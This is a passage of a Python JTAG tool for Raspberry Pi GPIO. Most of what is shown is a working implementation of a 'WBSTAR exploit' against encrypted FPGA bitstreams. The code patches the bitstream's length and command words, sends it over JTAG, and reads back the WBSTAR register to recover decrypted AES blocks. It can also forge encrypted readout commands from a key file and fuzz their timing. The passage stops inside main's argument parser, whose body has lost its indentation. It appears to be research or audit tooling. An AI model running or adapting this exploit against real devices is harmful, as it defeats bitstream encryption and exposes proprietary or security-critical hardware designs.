    logging.debug("original ciphertext len: %d", ciphertext_len)
    # patch a new length in, which is 0x98 (words)
    binfile[position+0] = 0x0
    binfile[position+1] = 0x0
    binfile[position+2] = 0x0
    binfile[position+3] = 0x98
    cipherstart = position + 4
    # we don't use this, but it's neat to see.
    iv_bytes = bitflip(binfile[iv_pos : iv_pos+0x10]) # note that the IV is embedded in the file
    logging.debug("recovered iv: %s", binascii.hexlify(iv_bytes))
    # recovered: raw words as read back (used to NOP-patch them on later passes)
    # block: the same words after bitflip(), as printed at the end
    recovered = [0,0,0,0]
    block = [0,0,0,0]
    # ro_fuzz positions the WBSTAR read inside the encrypted readout command;
    # NOTE(review): it only has an effect in the use_key path.
    if use_fuzzer:
        fuzz_min = 0
        fuzz_max = 0x98
    else:
        fuzz_min = 126 # determined through fuzzing
        fuzz_max = 127
    for ro_fuzz in range(fuzz_min, fuzz_max):
        for word_index in range(0, 4):
            # copy attack area as template
            attack_area = binfile[sync_pos:cipherstart + 0x98*4] # from HMAC header to end of "configuration footer"
            attack_cipherstart = cipherstart - sync_pos # subtract out the sync_pos offset
            # mutate the WBSTAR write length
            # 0xD selects the third word in the AES block; 0x1 is there originally, so must XOR that out
            wbstar_patch = 0xd - word_index
            attack_area[attack_cipherstart + 0x3b] = attack_area[attack_cipherstart + 0x3b] ^ wbstar_patch ^ 0x1
            # copy in the IV + target block (blocks offset-1 and offset of the ciphertext)
            dest = attack_cipherstart + 6*16 # 6x 16-byte AES blocks
            for source in range( sync_pos + attack_cipherstart + (offset-1)*16,
                                 sync_pos + attack_cipherstart + (offset+1)*16 ):
                attack_area[dest] = binfile[source]
                dest = dest + 1
            # patch in 0x2000_0000 (NOP) command over words as they are decrypted to prevent errant commands to fabric
            for patch in range(0, word_index):
                attack_area[attack_cipherstart + 0x6c - 4*patch] ^= (((recovered[3-patch] >> 24) & 0xff) ^ 0x20)
                attack_area[attack_cipherstart + 0x6d - 4*patch] ^= (((recovered[3-patch] >> 16) & 0xff) ^ 0x00)
                attack_area[attack_cipherstart + 0x6e - 4*patch] ^= (((recovered[3-patch] >> 8) & 0xff) ^ 0x00)
                attack_area[attack_cipherstart + 0x6f - 4*patch] ^= (((recovered[3-patch] >> 0) & 0xff) ^ 0x00)
            # attack_area now contains the data to configure
            debug = False  # True: hex-dump the attack data and write check<N>.bin
            if debug:
                i = 0
                for b in attack_area:
                    if i % 32 == 0:
                        print(" ")
                    i = i + 1
                    print("{:02x} ".format(b), end='')
                print(" ")
                with open("check{}.bin".format(word_index), "wb") as check:
                    check.write(attack_area)
            # run the attack
            attack_bits = int_to_binstr(int.from_bytes(attack_area, byteorder='big'))
            jtag_legs.append([JtagLeg.IR, '001001', 'idcode'])
            jtag_legs.append([JtagLeg.DR, '00000000000000000000000000000000', ' '])
            jtag_legs.append([JtagLeg.IR, '001011', 'jprogram'])
            jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
            jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
            jtag_legs.append([JtagLeg.RS, '0', 'reset'])
            jtag_legs.append([JtagLeg.IRD, '000101', 'cfg_in'])
            jtag_legs.append([JtagLeg.DRC, attack_bits, 'attack_data'])
            #jtag_legs.append([JtagLeg.RS, '0', 'reset'])
            #jtag_legs.append([JtagLeg.IR, '001001', 'idcode'])
            #jtag_legs.append([JtagLeg.DR, '00000000000000000000000000000000', ' '])
            while len(jtag_legs):
                jtag_next()
            if use_key:
                # Build an AES-CBC encrypted readout command from the .nky key.
                key_bytes = int(nky_key, 16).to_bytes(32, byteorder='big')
                logging.debug("key: %s", binascii.hexlify(key_bytes))
                with open(ifile, "rb") as ro:
                    ro_bytes = bytearray(ro.read())
                # same header scan as above, on a fresh copy of the file
                # NOTE(review): ro_iv_pos is unbound if 0x30016004 never appears.
                ro_pos = 0
                ro_sync_pos = 0
                while ro_pos < len(ro_bytes):
                    cwd = int.from_bytes(ro_bytes[ro_pos:ro_pos+4], 'big')
                    if cwd == 0xaa995566:
                        ro_sync_pos = ro_pos
                    if cwd == 0x30034001:
                        break
                    if cwd == 0x30016004:
                        ro_iv_pos = ro_pos+4
                    ro_pos = ro_pos + 1
                ro_desired_len = 0x98 # 0x10
                ro_pos = ro_pos + 4
                ro_bytes[ro_pos+0] = 0x0
                ro_bytes[ro_pos+1] = 0x0
                ro_bytes[ro_pos+2] = 0x0
                ro_bytes[ro_pos+3] = ro_desired_len
                ro_cipherstart = ro_pos+4
                ro_iv_bytes = bitflip(ro_bytes[ro_iv_pos : ro_iv_pos+0x10])
                logging.debug("recovered ro iv: %s", binascii.hexlify(ro_bytes[ro_iv_pos : ro_iv_pos+0x10]))
                logging.debug("recovered ro iv (flipped): %s", binascii.hexlify(ro_iv_bytes))
                ro_area = ro_bytes[ro_sync_pos:ro_cipherstart + ro_desired_len*4]
                cipher = AES.new(key_bytes, AES.MODE_CBC, ro_iv_bytes)
                if False: # these are static readout bitstreams, not used but kept around for future reference
                    # code is 512 bits long
                    if True:
                        readout_code = 0xaa995566200000002802000120000000200000002000000020000000200000002000000020000000200000002000000020000000200000002000000020000000
                        readout_len = 64
                    else:
                        readout_code = 0x2000000020000000ffffffffffffffffffffffffffffffffffffffffffffffff000000bb11220044ffffffffffffffffaa9955662000000030008001000000042000000020000000200000002802000120000000200000002000000020000000
                        readout_len = 96
                    readout_pad = ro_desired_len - readout_len//4
                    plaintext = bytearray()
                    plaintext += bytearray(readout_code.to_bytes(readout_len, byteorder='big'))
                    for i in range(0, readout_pad):
                        plaintext += int(0x20000000).to_bytes(4, byteorder='big')
                else: # dynamically generate the readout bitstream to fuzz the timing
                    # ro_desired_len words: sync word first, the WBSTAR read
                    # at word (ro_desired_len - ro_fuzz), NOPs everywhere else
                    read_wbstar = 0x28020001 # wbstar 0x28020001 / idcode 0x28018001
                    nop = 0x20000000
                    sync = 0xaa995566
                    plaintext = bytearray()
                    for i in range(0, ro_desired_len):
                        if i == 0:
                            plaintext += int(sync).to_bytes(4, byteorder='big')
                        elif i == ro_desired_len - ro_fuzz:
                            plaintext += int(read_wbstar).to_bytes(4, byteorder='big')
                        else:
                            plaintext += int(nop).to_bytes(4, byteorder='big')
                # bit order is flipped around the AES call, as for the IV above
                readout_crypt = bitflip(cipher.encrypt(bitflip(plaintext)))
                i = ro_cipherstart - ro_sync_pos
                for b in readout_crypt:
                    ro_area[i] = b
                    i = i + 1
                readout_cmd = int_to_binstr(int.from_bytes(ro_area, byteorder='big'))
                i = 0
                if debug:
                    for b in ro_area:
                        if i % 32 == 0:
                            print(" ")
                        i = i + 1
                        print("{:02x} ".format(b), end='')
                    print(" ")
                    with open("check-ro.bin".format(word_index), "wb") as check:
                        check.write(ro_area)
                jtag_legs.append([JtagLeg.IR, '001001', 'idcode'])
                jtag_legs.append([JtagLeg.DR, '00000000000000000000000000000000', ' '])
                #jtag_legs.append([JtagLeg.IR, '001011', 'jprogram'])
                #jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
                #jtag_legs.append([JtagLeg.IR, '010100', 'isc_noop'])
                #jtag_legs.append([JtagLeg.RS, '0', 'reset'])
                jtag_legs.append([JtagLeg.IRD, '000101', 'cfg_in'])
                jtag_legs.append([JtagLeg.DRC, readout_cmd, 'readout_command'])
                jtag_legs.append([JtagLeg.IRD, '000100', 'cfg_out'])
                jtag_legs.append([JtagLeg.DRR, '00000000000000000000000000000000', 'readout'])
                jtag_legs.append([JtagLeg.RS, '0', 'reset'])
                jtag_legs.append([JtagLeg.IR, '010100', 'noop'])
                while len(jtag_legs):
                    jtag_next()
                # readdata was set by the DRR 'readout' leg above
                if use_fuzzer:
                    print("Read command offset {} recovered word: {}".format(str(ro_fuzz), hex(int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big'))))
                else:
                    logging.debug("Recovered word at %s: %s", str(ro_fuzz), hex(int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big')))
                recovered[3-word_index] = readdata
                block[3-word_index] = int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big')
            else:
                ### preferred command: sync, NOP, read WBSTAR (0x28020001), NOP, NOP
                readout_cmd = 0xaa99556620000000280200012000000020000000
                ### induse soft reset + iprog to recover WBSTAR via pins
                #readout_cmd = 0xffffffffaa99556620000000280200012000000020000000300080010000000f20000000
                #readout_cmd = 0xffffffffaa9955662000000030020001e000000028020001300080010000000f20000000
                ### command as from Ender paper
                # readout_cmd = 0xffffffffffffffffffffffffffffffffffffffffffffffff000000bb11220044ffffffffffffffffaa9955662000000030008001000000042000000020000000200000002802000120000000200000002000000020000000
                # now perform the readout
                jtag_legs.append([JtagLeg.RS, '0', 'reset'])
                jtag_legs.append([JtagLeg.IRD, '000101', 'cfg_in'])
                jtag_legs.append([JtagLeg.DRC, int_to_binstr(readout_cmd), 'readout_command'])
                jtag_legs.append([JtagLeg.DL, '0', 'delay'])
                jtag_legs.append([JtagLeg.IR, '000100', 'cfg_out'])
                jtag_legs.append([JtagLeg.DRR, '00000000000000000000000000000000', 'readout'])
                jtag_legs.append([JtagLeg.RS, '0', 'reset'])
                jtag_legs.append([JtagLeg.IR, '010100', 'noop'])
                while len(jtag_legs):
                    jtag_next()
                # print("Recovered word: {}".format(hex(int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big'))))
                # input("Press enter to continue...")
                # readdata was set by the DRR 'readout' leg above
                logging.debug("Recovered word: %s", hex(int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big')))
                recovered[3-word_index] = readdata
                block[3-word_index] = int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big')
    # NOTE(review): with the default fuzz range (126..127) the outer loop runs
    # once, so this prints the single recovered block.
    print('AES block {} is 0x{:08x}{:08x}{:08x}{:08x}'.format(offset, block[0], block[1], block[2], block[3]))
def auto_int(x):
    """argparse ``type=`` converter that accepts any Python int literal.

    Base 0 infers the radix from the prefix (``0x``, ``0o``, ``0b``), so
    ``--address 0x100000`` and ``--address 1048576`` mean the same thing.
    """
    return int(x, base=0)
def main():
global TCK_pin, TMS_pin, TDI_pin, TDO_pin, PRG_pin
global jtag_legs, jtag_results
global gpio_pointer
global compat
global use_key, nky_key, nky_iv, nky_hmac, use_fuzzer
GPIO.setwarnings(False)
parser = argparse.ArgumentParser(description="Drive JTAG via Rpi GPIO")
parser.add_argument(
"-f", "--file", required=True, help="file containing jtag command list or bitstream", type=str
)
parser.add_argument(
"-b", "--bitstream", default=False, action="store_true", help="input file is a bitstream, not a JTAG command set (mutually exclusive with --raw-binary)"
)
parser.add_argument(
"--raw-binary", default=False, action="store_true", help="input file is a raw binary, not a JTAG command set (mutually exclusive with -b)"
)
parser.add_argument(
"-w", "--wbstar", help="Decode one AES block using WBSTAR exploit. Offset is specified in units of 128-bit blocks.", type=int
)
parser.add_argument(
"-c", "--compat", default=False, action="store_true", help="Use compatibility mode (warning: about 100x slower than FFI)"
)
parser.add_argument(
"-d", "--debug", help="turn on debugging spew", default=False, action="store_true"
)
parser.add_argument(
'--tdi', type=int, help="Specify TDI GPIO. Defaults to 27", default=27
)
parser.add_argument(
'--tdo', type=int, help="Specify TDO GPIO. Defaults to 22", default=22
)
parser.add_argument(
'--tms', type=int, help="Specify TMS GPIO. Defaults to 17", default=17
)
parser.add_argument(
'--tck', type=int, help="Specify TCK GPIO. Defaults to 4", default=4
)
parser.add_argument(
'--prg', type=int, help="Specify PRG (prog) GPIO. Defaults to 24", default=24
)
parser.add_argument(
"-i", "--input-key", help="Use specified .nky file to create readout command", type=str
)
parser.add_argument(
"-p", "--phuzz", help="Fuzz readout addresses on wbstar exploit with encrypted readout commands", default=False, action="store_true"
)
parser.add_argument(
"-s", "--spi-mode", help="Program a SPI memory using JTAGSPI", default=False, action="store_true"
)
parser.add_argument(
"-j", "--jtagspi-variant", help="Use the specified jtagspi bitstream variant, defaults to xc7s50", type=str, default="xc7s50"
)
parser.add_argument(
"-a", "--address", help="Address to load code into SPI memory, defaults to 0", type=auto_int, default=0
)
parser.add_argument(
"-n", "--no-verify", help="When selected, skips verification of SPI memory", default=False, action="store_true"
)
parser.add_argument(
"-r", "--reset-prog", help="Pull the PROG pin before initiating any commands", default=False, action="store_true"
)
parser.add_argument(
"--read", help="reads data to a file (argument is the filename)", default=False, action="store_true"
)
parser.add_argument(
"--read-len", help="length of data to read", default=0x280000, type=auto_int
)
parser.add_argument(